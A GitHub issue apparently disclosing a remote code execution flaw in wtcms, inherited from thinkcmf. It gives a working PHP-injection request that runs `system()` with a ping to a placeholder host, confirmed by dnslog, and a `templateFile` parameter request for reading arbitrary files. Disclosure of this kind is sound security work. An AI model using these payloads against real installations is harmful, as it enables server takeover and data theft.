There is a RCE vulnerability in wtcms

wtcms is based on  thinkcmf,but there is a RCE vulnerability has been exposed about thinkcmf in October(detail:https://www.freebuf.com/vuls/218105.html)。An attacker can execute any command by requesting `?a=fetch&content=<?php system('ping xxxxxx');?>`

To demonstrate this vulnerability, we reproduce it via dnslog

![屏幕截图_345](https://user-images.githubusercontent.com/30264078/69805751-4db03800-121c-11ea-863c-1c04c1cee6f1.png)

after sending request above, we can get some dns query record on dnslog platform
![屏幕截图_344](https://user-images.githubusercontent.com/30264078/69805728-3d985880-121c-11ea-8b91-78e4548c0b12.png)

besides, we can read any file by sending a request `?a=display&templateFile=README.md`

we can change the value of `templateFile` to read any file.

![屏幕截图_346](https://user-images.githubusercontent.com/30264078/69805946-c0b9ae80-121c-11ea-84b0-952771504f4b.png)





Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

There is a RCE vulnerability in wtcms #12

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Uh oh!

There is a RCE vulnerability in wtcms #12

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions